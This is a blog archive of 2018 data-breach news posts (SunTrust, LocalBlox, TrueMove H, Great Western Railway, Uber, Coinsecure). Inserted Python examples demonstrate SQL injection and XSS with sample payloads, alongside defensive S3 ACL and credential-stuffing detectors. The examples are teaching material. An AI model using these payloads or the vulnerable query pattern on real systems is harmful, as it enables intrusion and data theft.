Category Archives: Data Breach

Former SunTrust employee stole data on 1.5 million clients

US commercial bank SunTrust announced on Friday that it has fallen victim to an insider threat, and that the records of some 1.5 million of its customers had been extracted from its systems. What is known so far, and has been shared with investors by the bank’s Chairman and CEO William Rogers, is that the insider was a former employee who had tried to download customer data and hand it over to a “criminal third party.” Rogers said that …

The post Former SunTrust employee stole data on 1.5 million clients appeared first on Help Net Security.

Health Stream left exposed online a database containing contact data for roughly 10,000 medics

An IT professional has discovered that the US healthcare company Health Stream left exposed online contact information for roughly 10,000 medics.

The IT expert Brian Wethern has discovered that the US healthcare company Health Stream left exposed online a database containing contact information for roughly 10,000 medics.

Wethern reported his discovery to Health Stream ten days ago; he explained that the data were hosted on one of the websites that has since been removed.

Records in the archive left open online include the last names of medics connected to Health Stream’s Neonatal Resuscitation Program, their email addresses, and ID numbers.

The site hosting the medics’ records was taken offline shortly after Wethern reported the data leak, but even though the website is no longer accessible, the leaked data are still available in various online caches.

Leaked data could be used by threat actors to launch a spear phishing campaign against medics at Health Stream.

“What I found was a front-side database,” Wethern told El Reg. “I don’t need their passwords … because I have the front-side database.”

Wethern decided to disclose the data leak to warn of the risks of such kind of incidents and highlight the importance of reserving a budget for cybersecurity of IT infrastructure.

“Hire a basic researcher, first and foremost. Allow your company to budget for these types of intrusions,” Wethern added.

“And before this all happens, make sure to have a data breach summary in place. Be current with bug bounty programs, own up to your mistakes, and honor the fact that security researchers can be good people out to do good things.”

Health Stream did not comment on the data leak.

Pierluigi Paganini

(Security Affairs – Health Stream, data leak)

The post Health Stream left exposed online a database containing contact data for roughly 10,000 medics appeared first on Security Affairs.

SunTrust unfaithful employee may have stolen data on 1.5 Million customers

SunTrust Banks Inc announced it discovered that a former employee may have attempted to download information on nearly 1.5 million clients and share it with a criminal organization.

A former employee at the SunTrust Bank may have stolen data on 1.5 million clients, including names, addresses, phone numbers, and account balances.

“The company became aware of potential theft by a former employee of information from some of its contact lists. Although the investigation is ongoing, SunTrust is proactively notifying approximately 1.5 million clients that certain information, such as name, address, phone number and certain account balances may have been exposed.” reads the press release published by the bank.

“The contact lists did not include personally identifying information, such as social security number, account number, PIN, User ID, password, or driver’s license information. SunTrust is also working with outside experts and coordinating with law enforcement.”

 

The bank said it believes the information doesn’t include personally identifiable information, such as social security numbers, account numbers, pins, user IDs, passwords or driver’s license numbers.

SunTrust is notifying approximately 1.5 million clients that certain information may have been exposed.


According to the Reuters agency, the unfaithful employee tried to download the client data a few weeks ago in an attempt to sell it to a criminal.

“Chief Executive Officer William Rogers brought the incident to light on a post-earnings call with analysts on Friday. He said the attempt to download client information was made six to eight weeks ago.” reported Reuters.

SunTrust CEO William Rogers said that there was no indication of fraudulent activity using the exposed information, and that the data likely had not been sent outside the bank.

SunTrust is now offering free identity protection services to all of its clients.

“SunTrust Banks, Inc. (NYSE: STI) is now offering Identity Protection for all current and new consumer clients at no cost on an ongoing basis. Experian IDnotify™ will be provided to those who sign up for the service.” continues the press release.

“The IDnotify product by Experian is being offered in addition to existing SunTrust security protocols: ongoing monitoring of accounts, FICO score program, alerts, tools and zero liability fraud protection.”

Pierluigi Paganini

(Security Affairs – Data Breach, cybercrime)

The post SunTrust unfaithful employee may have stolen data on 1.5 Million customers appeared first on Security Affairs.

5 things you can expect to happen after the GDPR deadline

After several years in the making and around 24 months since it was officially ratified, the EU General Data Protection Regulation (GDPR) is almost here. The most important thing to

The post 5 things you can expect to happen after the GDPR deadline appeared first on The Cyber Security Place.

Private Intelligence agency LocalBlox leaked 48 Million personal data records

The private intelligence agency LocalBlox has left unsecured online an AWS bucket containing 48 million records that were also harvested from Facebook, LinkedIn, and Twitter.

Oops … another data breach made the headlines and once again it was discovered by data leak hunters at Upguard. The private intelligence agency LocalBlox has left unsecured online an AWS bucket containing 48 million records that were collected in part from Facebook, LinkedIn, and Twitter.

“The UpGuard Cyber Risk Team can now confirm that a cloud storage repository containing information belonging to LocalBlox, a personal and business data search service, was left publicly accessible, exposing 48 million records of detailed personal information on tens of millions of individuals, gathered and scraped from multiple sources.” reads the blog post published by UpGuard.

The AWS S3 bucket was discovered by the popular expert Chris Vickery, director of cyber risk research at UpGuard, on February 18; it was exposed at the subdomain “lbdumps.”

The bucket contained a single 151.3 GB compressed file titled “final_people_data_2017_5_26_48m.json,” which, once decompressed, revealed a 1.2 TB ndjson (newline-delineated json) file.


The analysis of metadata in a header file allowed the researchers to attribute it to LocalBlox.

The records include names, physical addresses and dates of birth harvested from social media. The case immediately brings to mind the recent Cambridge Analytica affair.

“In the wake of the Facebook/Cambridge Analytica debacle, the importance of massive sets of psychographic data is becoming more and more apparent. The exposed LocalBlox dataset combines standard personal information like name and address, with data about the person’s internet usage, such as their LinkedIn histories and Twitter feeds.” continues the blog post.

The leaked data were collected from multiple sources and aggregated by IP address; for example, names, street addresses, dates of birth and job histories were harvested from LinkedIn, Facebook, Twitter, and Zillow real estate data.

Other sources are purchased databases and payday loan operators. This discovery demonstrates that many other entities scrape social media to gather user data for different purposes.

“Some are fairly unambiguous, pointing to aggregated content, purchased marketing databases, or even information caches sold by payday loan operators to businesses seeking marketing data. Other fields are more mysterious, such as a source field labeled “ex.”” continues the post.

“The presence of scraped data from social media sites like Facebook also highlights an important fact: all too often, data held by widely used websites can be targeted by unknown third parties seeking to monetize this information.”

This case is doubly shocking … the company not only harvested user data from social networks that were unable to detect its activity, but also failed to secure this data.

LocalBlox still hasn’t commented on the data leak.

Pierluigi Paganini

(Security Affairs – LocalBlox, data leak)

The post Private Intelligence agency LocalBlox leaked 48 Million personal data records appeared first on Security Affairs.

As Cyber Risk Escalates, the C-Suite Must Take Action

This article was published on LinkedIn on April 19, 2018. You can read the original post here.

So far, 2018 has started out to be a very good year for cybercriminals. In the first week of April alone, restaurant chains and large department stores, some of America’s major retailers, disclosed significant data breaches. A multitude of government and healthcare organizations around the world have also been breached in the short three-and-a-half months of this year.

The trend is accelerating, and the disclosure of breaches has moved from weekly to nearly daily and sometimes several within a day. With the role C-suites and boards have in the management of the organization’s financial and reputational risks, the questions business leaders need to ask themselves are: How prepared is my organization, from top to bottom? Are the right people responsible for cyberthreat preparedness? How well does our C-suite and board understand the plan and the liability issues they may face in poor cybersecurity planning and incident management? How resilient is our organization in the aftermath of a significant breach?

C-Level and Board Responsibility for Cyber Risk — Still Over-Focused on IT

In one report from CSO Online called “The Current State of Cybercrime,” from a study conducted less than a year ago in the U.S., it was found that 6 out of 10 boards “believe cyber risk is an IT problem.” As long this belief exists, organization leaders will remain disengaged from the solutions and their role in supporting a robust cyber risk management strategy. With the number and severity of cyber risks growing exponentially, the magnitude of this risk needs to be better understood by many business leaders.

For those who still think cyber risk is an IT problem, I challenge them to consider this:

  • Cybercriminals are organized. They may have more ’employees’ than your security department and better tools than your IT department. Cybercrime is coordinated, automated and well-funded. The criminals are sharing tools and collaborating globally. Are you?
  • Your organization’s exposure to attacks (through mobile devices, in the cloud, through IoT) is growing exponentially. The days of simply building walls around your data center are over.
  • Criminals are opportunistically seeking your organization’s “inadvertent insider” who will blindly click on an attachment. The latest IBM X-Force Threat Intelligence Index report found that inadvertent insiders were responsible for more than 20 percent of the breaches in 2017, up from the previous year, and for more than two-thirds of total records compromised.
  • With a global skills shortage, other organizations are trying to poach your security employees and pay them better than you can. This will be a continuing problem. Open cybersecurity jobs are forecast to hit 1.5–2 million globally by 2020. So those enlisted to protect your organization may not be there next week or next month, including your security leadership.

Organizationwide Responsibility Is Critical in Security Strategy

Having a high-level, comprehensive cybersecurity strategy has never been more important, particularly in light of the digital transformation taking place across industries. Innovative new business models using new technologies like the Internet of Things (IoT), blockchain, mobile and cloud must include top-down recognition and protection from the tremendous cyber risks created if business-enabling innovations are not managed properly and systematically. Based on our experience and research, one thing is very clear: An effective security program, including risk identification, investments, plans and a well-coordinated incident response plan, is an organizationwide responsibility. C-suite executives that take cybersecurity seriously should implement best practices across the company. They need to:

  • Understand the true exposure. Have an accurate assessment of your cyber risk. Understand your “crown jewels,” both data and systems that are at risk. Where is the company implementing new digital initiatives such as cloud or blockchain or IoT? Have you considered the risk and how to manage those initiatives in a secure and compliant way? Have you tested your controls and decided which need strengthening?
  • Prioritize security investments in a way that links with this assessed risk.
  • Ensure that your program includes intelligence of new and emerging cyberthreats.
  • Implement a response and recovery plan to keep your business running in the event of cyberattack. This should be practiced routinely across the C-suite. Our experiences from our IBM Cyber Range show that small details (e.g., know who is in charge, how you will communicate and what are the roles of the team) can be the difference between success and failure in responding in a timely manner.
  • Remain vigilant. Keep challenging your approach. There must be a culture of cybersecurity awareness, essential training, and constant questioning and testing across the organization. The threat is constantly changing; security requires vigilance and a mindset that never assumes, “We’ve fixed security now.”

Plans Don’t Have to Be Perfect

The best plans are not perfect, but they are robust. Robust plans consider failure points, build in contingencies, and are designed to help us learn quickly and adjust. In cybersecurity planning, C-level executives and boards need to build a strategy that prepares the organization for the entire threat and risk management life cycle, from insight to determining priority vulnerabilities and potential threats, through to prevention, detection, and response and recovery. The response and recovery plans need be tested and practiced, something we are helping thousands of clients simulate in our Cyber Range.

In a highly publicized speech in 2014 titled “Boards of Directors, Corporate Governance and Cyber Risks: Sharpening the Focus,” then-Securities and Exchange Commission Chair Luis Aguilar made some critical recommendations:

  1. Boards should consider the NIST Cybersecurity Framework.
  2. Boards should consider structural changes to focus on cyber risk.
  3. Internal roles should be focused on cyber risk.
  4. Boards need to ensure preparedness for the inevitable cyberattack.

This was some of the best advice then, and it’s still some of the best advice today.

Now, more than ever, it is critical that a cybersecurity strategy is viewed as more than a set of technologies and instead as an enterprisewide program, led from the top, that creates a comprehensive approach tailored to risk and compliance, governance, risk reduction and, above all, business resiliency.

Learn more about IBM X-Force Threat Management Services


The post As Cyber Risk Escalates, the C-Suite Must Take Action appeared first on Security Intelligence.

48 million people put at risk after firm that scraped info from social networks left it exposed for anyone to download


Chances are that you’ve never heard of Washington-based data firm LocalBlox. But that doesn’t mean that they haven’t heard of you. And it doesn’t mean that your personal information hasn’t been recklessly exposed through their sloppy disregard for the most basic security.

Read more in my article on the Hot for Security blog.

Facebook claims that Google and Twitter also collect users’ offline data

Facebook drags Google and Twitter into privacy scuffle

Recently, it was revealed that data analysis firm, Cambridge Analytica and Facebook were involved in a privacy data scandal wherein the former illegally harvested up to 87 million Facebook users’ personal data without their knowledge and consent. Facebook allowed thousands of app developers to harvest data through third-party online games and quizzes.

This scandal raised concerns over users’ data privacy, for which Facebook’s CEO Mark Zuckerberg had to face intensive questioning by U.S. lawmakers over the company’s collection and use of user data.

The popular social media giant has now released a detailed blog post explaining how Facebook collects information about its users from the web even if you’re not a Facebook user or are logged out of your account. The blog post that was posted by David Baser, Facebook Product Management Director on Monday said that the post is a partial response to questions Zuckerberg was unable to answer during his Senate and Congressional hearings.

Baser pointed out in the blog post that not only Facebook even companies like Google, Twitter and Amazon use many of the same user data collection practices that the social media giant does.

He wrote, “Twitter, Pinterest, and LinkedIn all have similar Like and Share buttons to help people share things on their services. Google has a popular analytics service. And Amazon, Google, and Twitter all offer login features. These companies — and many others — also offer advertising services. In fact, most websites and apps send the same information to multiple companies each time you visit them.” Explaining how Facebook receives cookies, IP address, and browser info about users from other sites, he added, “When you see a YouTube video on a site that’s not YouTube, it tells your browser to request the video from YouTube. YouTube then sends it to you.”

Baser said the team on individuals for their own benefit. He wrote: “Apps and websites that use our services, such as the Like button or Facebook Analytics, send us information to make their content and ads better.”

In return, Facebook helps those websites serve up relevant and engaging ads or receive analytics to study how people use their services.

“When you visit a site or app that uses our services, we receive information even if you’re logged out or don’t have a Facebook account. This is because other apps and sites don’t know who is using Facebook,” Baser added.

“Our privacy policy explains in detail what we do with the information we receive — and we just updated the policy to make it easier to read. There are three main ways in which Facebook uses the information we get from other websites and apps: providing our services to these sites or apps; improving safety and security on Facebook; and enhancing our own products and services. I’ll share a little more about each of these, but first I want to be clear: We don’t sell people’s data. Period,” he concluded.

This appears to be perfectly justifiable for the social media giant. After Zuckerberg’s testimony in Congress last week, the company says it is working to be more transparent about what information Facebook has and how it is used. It says it wants to put its Facebook users in control.

The post Facebook claims that Google and Twitter also collect users’ offline data appeared first on TechWorm.

Equifax was not an isolated incident: the danger of Web apps

Nowadays it is possible to do almost anything from a Web browser, thanks to the expansion of cloud computing. Previously, users had to download, install and run programs for almost any task. Yet now, thanks to Web applications, simply having a browser is sufficient: we use Web applications to check email, make presentations, watch TV series and movies, edit images, etc., both at home and at work.

In the sights of cybercriminals

The increasing proliferation of Web applications has not gone unnoticed by cybercriminals. In recent months, these applications have gained popularity as a vector for attacks in numerous security incidents. The Verizon Data Breach Report 2017 highlights two figures that illustrate how popular these attacks have become: almost 3 out of 10 security breaches were caused by attacks on Web applications, and the rate of security breaches stemming from Web application security flaws increased by 300 percent between 2014 and 2016.

In a world that now goes around thanks to Web applications, those with inadequate security have become highly attractive targets for cybercriminals who want to find a simple way of infiltrating corporate networks. Although companies benefit in various ways from the capabilities of Web applications, the prevalence of security vulnerabilities is exposing companies to significant risks. The most revealing case of the negative consequences of not ensuring the security of such tools is that of Equifax.

The Equifax case: the data of more than 147 million customers exposed

The security breach suffered by this credit reporting company in September 2017 was one of the biggest data thefts in history. The company had until recently admitted that data of some 145.5 million users had been leaked, although it has now adjusted that figure up to 147.9 million.

The question is though, could such an attack have been prevented? The answer is simply, yes. Equifax left the door open to cybercriminals by not updating Apache Struts, an open-source Web application development framework. By not applying patches, a vulnerability allowed hackers to reveal the social security numbers, postal addresses and even driving license numbers of millions of people. This illustrates how the failure to follow basic security measures, such as patching the software used by a company, can have tremendous consequences. As Zane Lackey, a leading expert in Web application security, explains, there are two lessons to be learned from the attack on Equifax. Firstly, that 99 percent of the time attacks happen due to common and simple errors: unpatched systems, weak passwords, malware on an endpoint, etc. And secondly, that security risks have shifted from the network to the application and endpoint layer.

The time has come to protect Web applications

If you don’t want your company to become the next Equifax, you should keep an eye out for these types of common attacks and take appropriate measures to keep them at bay.

According to Imperva, cross-site scripting or XSS vulnerabilities accounted for the highest number of Web application vulnerabilities in 2017. In fact, they have doubled in number compared to 2016. These attacks inject malicious scripts into vulnerable websites and allow attackers to steal sensitive data or even take control of devices. Imperva predicts that they will continue to be the most frequent attacks in 2018.

Another frequent attack is SQL injection. SQL programming language is so commonly used to manage and share information across applications, that cybercriminals see it as a perfect opportunity to perform attacks by entering their own SQL commands into databases. As many servers that store critical data from Web applications use SQL to manage communication with the data, hackers enter commands that allow them to edit, steal or delete this information.
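To make the two attack classes above concrete, here is an added example (not code from Panda Security or from the original post) that puts a vulnerable lookup beside its hardened form. It uses an in-memory SQLite table with constructed sample rows: the injectable version builds the SQL string from user input, the safe version passes the value as a bound parameter so it can never become SQL syntax; the HTML pair shows the same idea for XSS, where `html.escape` turns an attacker-supplied display name into inert text. Function and table names are this example's own.

```python
import html
import sqlite3


def make_demo_db():
    """In-memory SQLite database with a few constructed rows (sample data, not from any breach)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, balance REAL)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", 120.5),
        ("bob", "bob@example.com", 42.0),
        ("carol", "carol@example.com", 9001.0),
    ])
    return conn


def lookup_vulnerable(conn, username):
    """SQL injection: the query is built by string formatting, so the input
    `' OR '1'='1` closes the quoted literal and appends its own condition,
    returning every row instead of one."""
    query = "SELECT username, email, balance FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Parameterised query: the driver sends the value separately from the SQL text,
    so the same input is compared as a literal string and matches nothing."""
    return conn.execute(
        "SELECT username, email, balance FROM users WHERE username = ?", (username,)
    ).fetchall()


def render_greeting_vulnerable(display_name):
    """Reflected XSS: untrusted text is pasted straight into the HTML."""
    return "<p>Welcome, %s!</p>" % display_name


def render_greeting_safe(display_name):
    """Output encoding: <, >, &, and quotes become entities, so a script tag
    in the name is displayed as text rather than executed by the browser."""
    return "<p>Welcome, %s!</p>" % html.escape(display_name, quote=True)


if __name__ == "__main__":
    db = make_demo_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # all three rows
    print("safe:      ", lookup_safe(db, payload))         # []
    name = "<script>alert(1)</script>"
    print(render_greeting_vulnerable(name))
    print(render_greeting_safe(name))
```

The hardened pair is the whole fix: bind every value that comes from the client, and encode every value at the point where it is written into HTML. Frameworks that do both by default (ORMs, auto-escaping template engines) are the "secure from the outset" design the post recommends.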

In addition to the danger of external Web applications, internal Web applications also pose serious security risks, and they are an even easier target once an attacker has managed to gain access to the internal network.

To ensure the security of your company is not compromised by vulnerabilities in Web applications, the priority must be to design these applications securely from the outset. To this end, you can follow these tips: store raw data and encrypt it when rendering it, avoid non-secure frameworks (or update the ones you use, unlike Equifax!) and JavaScript calls that avoid encryption, etc. You should also provide developers with tools that let them see how their Web applications are being attacked, so they can react accordingly.

Another essential measure is to encrypt all data. WAFs (Web application firewalls) are not the panacea and they will not provide 100 percent protection, but encrypting information can frustrate potential attacks.

Finally, install a security solution that provides detailed visibility into all the activity that takes place on endpoints, continuously monitoring all running processes and applications. Panda Adaptive Defense protects you from the dangers of Web applications and prevents your company from becoming the next Equifax.

The post Equifax was not an isolated incident: the danger of Web apps appeared first on Panda Security Mediacenter.

Ransomware, healthcare and incident response: Lessons from the Allscripts attack

The actors behind SamSam launched a devastating attack against Allscripts in January, 2018. As Allscripts worked its incident response plan, things started to unravel. Here are the lessons learned. On

The post Ransomware, healthcare and incident response: Lessons from the Allscripts attack appeared first on The Cyber Security Place.

Large scale data breaches provide drive for DevSecOps investments

Breaches related to open source components have grown 50 percent since 2017, and an eye-opening 121 percent since 2014, according to a new survey from open source governance and DevSecOps

The post Large scale data breaches provide drive for DevSecOps investments appeared first on The Cyber Security Place.

Why organizations need business-centric data protection

A data protection team can help your enterprise take the best steps towards reducing the business risks and data breaches. Despite the recent surge in interest towards information security, we consistently

The post Why organizations need business-centric data protection appeared first on The Cyber Security Place.

TrueMove H, the biggest 4G mobile operator in Thailand suffered a data leak

TrueMove H, the biggest 4G mobile operator in Thailand, suffered a data leak: 46,000 people’s data stored in an AWS bucket were left accessible online, including driving licenses and passports.

Let’s speak about a new data breach, this time the victim is TrueMove H, the biggest 4G mobile operator in Thailand.

The operator exposed online customers’ personal data that were stored in an Amazon AWS S3 bucket.

The leaked data also includes scans of identity documents, the data were left accessible until April 12, when the company restricted the access.

The huge trove of data was discovered by security researcher Niall Merrigan, who attempted to notify TrueMove H of the issue, but the operator did not respond.

Merrigan told El Reg that the AWS bucket contained 46,000 records, for a total of 32GB.

The expert published a blog post on the case, in which he explained that tools like bucket-stream and bucket-finder allow scanning the internet for open AWS S3 buckets.

Merrigan used the bucket-finder tool to find open S3 buckets when he noticed the one belonging to TrueMove H.

“The output from bucket-finder showed several issues such as config files, source code and other potential information disclosures. Bucket finder only gets the top 1000 files via the AWS S3 API. To simplify things, I loaded the results into a small SQL database for analysis. I found all the sites that had 1000 files and did a quick visual scan to see what they contained and if there was a way to identify the owner if the need arose.” wrote the expert.

“One such owner was True Move H, the second largest mobile operator in Thailand,”
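The open-bucket scanning described above has a straightforward defensive counterpart: audit the ACLs of your own buckets for grants to the two AWS public groups, which is what turns a bucket into one of the "open S3 buckets" such tools enumerate. The following is an added example, not Merrigan's tooling nor UpGuard's, and not any real ACL from TrueMove H or LocalBlox. It assumes the ACL dictionary shape that boto3's `get_bucket_acl` returns and the two real AWS group URIs; the bucket names, the `FakeS3Client` stand-in and the ACL contents are constructed so the audit runs offline.

```python
# Grantee URIs AWS uses for its two public groups. A grant to either one on a
# bucket ACL lets the world (or any AWS account holder) list the bucket; the
# same grant on an object ACL lets them download the object.
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "everyone (anonymous)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}


def public_grants(acl):
    """Return [(who, permission)] for every grant in an S3 ACL that targets a public group.

    `acl` follows the shape boto3's s3.get_bucket_acl() / get_object_acl() return:
    {"Owner": {...}, "Grants": [{"Grantee": {"Type": "Group", "URI": ...},
                                 "Permission": "READ"}, ...]}
    """
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUP_URIS:
            findings.append((PUBLIC_GROUP_URIS[grantee["URI"]], grant.get("Permission")))
    return findings


def audit_bucket(s3_client, bucket):
    """Fetch a bucket ACL through a boto3-style client and report any public grants."""
    acl = s3_client.get_bucket_acl(Bucket=bucket)
    found = public_grants(acl)
    return {"bucket": bucket, "public_grants": found, "is_public": bool(found)}


# Constructed ACLs (hypothetical owner id and display name). EXPOSED_ACL mirrors the
# world-readable misconfiguration behind the leaks discussed above; PRIVATE_ACL is
# the default owner-only ACL a freshly created bucket has.
OWNER = {"DisplayName": "example-owner", "ID": "EXAMPLE_CANONICAL_ID"}
EXPOSED_ACL = {
    "Owner": OWNER,
    "Grants": [
        {"Grantee": dict(OWNER, Type="CanonicalUser"), "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
PRIVATE_ACL = {
    "Owner": OWNER,
    "Grants": [{"Grantee": dict(OWNER, Type="CanonicalUser"), "Permission": "FULL_CONTROL"}],
}


class FakeS3Client:
    """Offline stand-in for boto3.client("s3") exposing only get_bucket_acl.
    In real use pass boto3.client("s3") to audit_bucket instead."""

    def __init__(self, acls_by_bucket):
        self._acls = acls_by_bucket

    def get_bucket_acl(self, Bucket):
        return self._acls[Bucket]


if __name__ == "__main__":
    client = FakeS3Client({"example-dumps": EXPOSED_ACL, "example-private": PRIVATE_ACL})
    for name in ("example-dumps", "example-private"):
        print(audit_bucket(client, name))
```

Run against a real account by iterating over `s3.list_buckets()["Buckets"]` and calling `audit_bucket` on each name; a bucket that also carries a bucket policy with `"Principal": "*"` is public even with a clean ACL, so a complete audit checks both.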


“Representatives of the telco initially told him to ring its head office when he asked for the contact details of a security response staffer before telling him his concerns had been passed on some two weeks later, after El Reg began asking questions on the back of Merrigan’s findings,” reported El Reg.

TrueMove H has issued a statement clarifying that the data leak affected its subsidiary I True Mart.

Pierluigi Paganini

(Security Affairs – TrueMove H, data leak)

The post TrueMove H, the biggest 4G mobile operator in Thailand suffered a data leak appeared first on Security Affairs.

Great Western Railway asks users to reset passwords due to a security breach

The British train company Great Western Rail announced it has suffered a security breach that affected at least 1,000 accounts out of more than a million.

The company, owned by the FirstGroup transport business, runs trains between London, Penzance, and Worcester.

Great Western Rail is urging affected customers to change the password used to access the GWR.com portal, and it has also informed the UK Information Commissioner’s Office.

Attackers used credential stuffing to access the accounts; this means that the hackers attempted to log in using credentials leaked in other data breaches.

The company is now extending the incident response measures to other account holders.

“We have identified unauthorised automated attempts to access a small number of GWR.com accounts over the past week,” a spokesman told the BBC.

“While we were able to shut this activity down quickly and contact those affected, a small proportion of accounts were successfully accessed.”

“The success rate of the automated logins was extremely low, suggesting any passwords used were likely harvested elsewhere,”
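The spokesman's observation, many automated logins with an extremely low success rate, is exactly the signature a defender can alert on. The following added example (not GWR's code and not based on its logs) shows detection logic run over constructed login records: it groups attempts by source address, flags sources that try many distinct accounts with a low hit rate, and then lists the accounts those sources did get into, which are the ones to reset first. The log line format, the TEST-NET addresses and the thresholds are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log (no real system): one source sprays 50 different usernames
# and succeeds twice, an ordinary user mistypes once and then logs in normally.
SAMPLE_LOG = (
    [f"2018-04-12T10:00:{i:02d}Z src=203.0.113.5 user=user{i:03d} result=FAIL"
     for i in range(48)]
    + ["2018-04-12T10:00:48Z src=203.0.113.5 user=user048 result=OK",
       "2018-04-12T10:00:49Z src=203.0.113.5 user=user049 result=OK",
       "2018-04-12T10:01:00Z src=198.51.100.7 user=alice result=FAIL",
       "2018-04-12T10:01:05Z src=198.51.100.7 user=alice result=OK",
       "2018-04-12T10:02:00Z src=198.51.100.7 user=alice result=OK"]
)

# Hypothetical log format: "<timestamp> src=<ip> user=<name> result=OK|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_line(line):
    """Return the fields of one login record, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def summarize_sources(lines):
    """Per source address: total attempts, successes, and the set of usernames tried."""
    stats = defaultdict(lambda: {"attempts": 0, "successes": 0, "users": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["src"]]
        s["attempts"] += 1
        s["users"].add(rec["user"])
        if rec["result"] == "OK":
            s["successes"] += 1
    return stats


def detect_credential_stuffing(lines, min_attempts=20, min_distinct_users=10,
                               max_success_rate=0.10):
    """Flag sources that hit many distinct accounts with a very low success rate.

    A single user retrying a forgotten password fails the distinct-user test;
    a shared corporate proxy fails the success-rate test. Credential stuffing,
    where each guess is a leaked pair for a different account, trips both."""
    flagged = {}
    for src, s in summarize_sources(lines).items():
        rate = s["successes"] / s["attempts"]
        if (s["attempts"] >= min_attempts
                and len(s["users"]) >= min_distinct_users
                and rate <= max_success_rate):
            flagged[src] = {"attempts": s["attempts"],
                            "distinct_users": len(s["users"]),
                            "successes": s["successes"],
                            "success_rate": round(rate, 3)}
    return flagged


def accounts_to_reset(lines, flagged):
    """Accounts that a flagged source logged into successfully: reset these first."""
    hit = set()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["src"] in flagged and rec["result"] == "OK":
            hit.add(rec["user"])
    return hit


if __name__ == "__main__":
    suspects = detect_credential_stuffing(SAMPLE_LOG)
    for src, info in suspects.items():
        print(src, info)
    print("reset:", sorted(accounts_to_reset(SAMPLE_LOG, suspects)))
```

The per-source grouping is deliberately simple; a real campaign rotates through many addresses, so a production rule would also group by user agent or by time bucket across all sources and compare the global failure rate against its baseline.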

The following image shows a data breach notification received by a customer.

GWR notification

The message informs users that Great Western Rail has reset all GWR.com passwords as a precaution.

“To ensure the security of your personal information you will need to do this when you next log in to the GWR.com website.” reads the message.

“You should use a unique password for each of your accounts for security, and we recommend you review all of your accounts for maximum security, and we recommend you review all your online passwords and change any that are the same.”

 

If you are a Great Western Rail user, change your password, and change the password for each website where you used the same credentials.

As usual, let me suggest using a strong password and enabling two-factor authentication when available.

Pierluigi Paganini

(Security Affairs – Great Western Rail, hacking)

The post Great Western Railway asks users to reset passwords due to a security breach appeared first on Security Affairs.

Uber agrees to new FTC settlement over 2016 data breach

Uber agrees to a new settlement with the Federal Trade Commission over the massive 2016 data breach; the authorities could impose civil penalties on the company if it fails to share incident data with the FTC.

Uber agrees to a new settlement with the Federal Trade Commission over the massive 2016 data breach.

“Uber Technologies, Inc. has agreed to expand the proposed settlement it reached with the Federal Trade Commission last year over charges that the ride-sharing company deceived consumers about its privacy and data security practices.” states the FTC.

“Due to Uber’s misconduct related to the 2016 breach, Uber will be subject to additional requirements. Among other things, the revised settlement could subject Uber to civil penalties if it fails to notify the FTC of certain future incidents involving unauthorized access of consumer information.”

In November 2017, Uber CEO Dara Khosrowshahi announced that hackers had broken into the company database and accessed the personal data of 57 million of its users; the disconcerting revelation was that the company had covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, it was easy for hackers that according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the company development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for avoiding publish the stolen data.

Rather than to notify the data breach to customers and law enforcement as is required by California’s data security breach notification law, the chief of information security Joe Sullivan ordered to pay the ransom and to cover the story destroying any evidence. The payout was disguised as a bug bounty prize complete with non-disclosure agreements signed


In 2017 the FTC charged the company with deceiving customers about its privacy and data security practices.

The first settlement dates back to August 2017. According to the FTC, the company had failed to apply security measures to protect customer and driver data; later, while investigating that settlement, the Commission discovered that the company had not disclosed the 2016 data breach until 2017.

According to the new settlement with the Federal Trade Commission, Uber is obliged to disclose any future breach affecting consumer data and to share reports from required third-party audits of its privacy program.

The company must also maintain records related to bug bounty activities. The FTC could impose civil penalties on the company if it fails to implement the above actions.

“After misleading consumers about its privacy and security practices, Uber compounded its misconduct by failing to inform the Commission that it suffered another data breach in 2016 while the Commission was investigating the company’s strikingly similar 2014 breach,” said Acting FTC Chairman Maureen K. Ohlhausen. “The strengthened provisions of the expanded settlement are designed to ensure that Uber does not engage in similar misconduct in the future.”

Pierluigi Paganini

(Security Affairs – FTC settlement, Uber data breach)

The post Uber agrees to new FTC settlement over 2016 data breach appeared first on Security Affairs.

$3.3 Million stolen from main Coinsecure Bitcoin wallet

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue: 438 bitcoin, $3.3 million worth of bitcoin

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue: 438 bitcoin, $3.3 million worth of bitcoin, have been transferred from the main wallet to an account that is not under its control.

CEO Mohit Kalra said that only he and the Chief Strategist Officer (CSO) Dr. Amitabh Saxena held the private keys to the exchange’s main wallet.

“The current issue points towards losses caused during an exercise to extract BTG to distribute to our customers. Our Chief Strategist officer (CSO) Dr. Amitabh Saxena was extracting BTG and he claims that the funds have been lost in the process during the extraction of the private keys.” reads the statement published by Coinsecure.

According to the CEO of Coinsecure, the CSO is responsible for the transfer. The company posted two images on its website: a company statement signed by the Coinsecure team and a scanned copy of a police complaint filed by Coinsecure CEO Mohit Kalra.


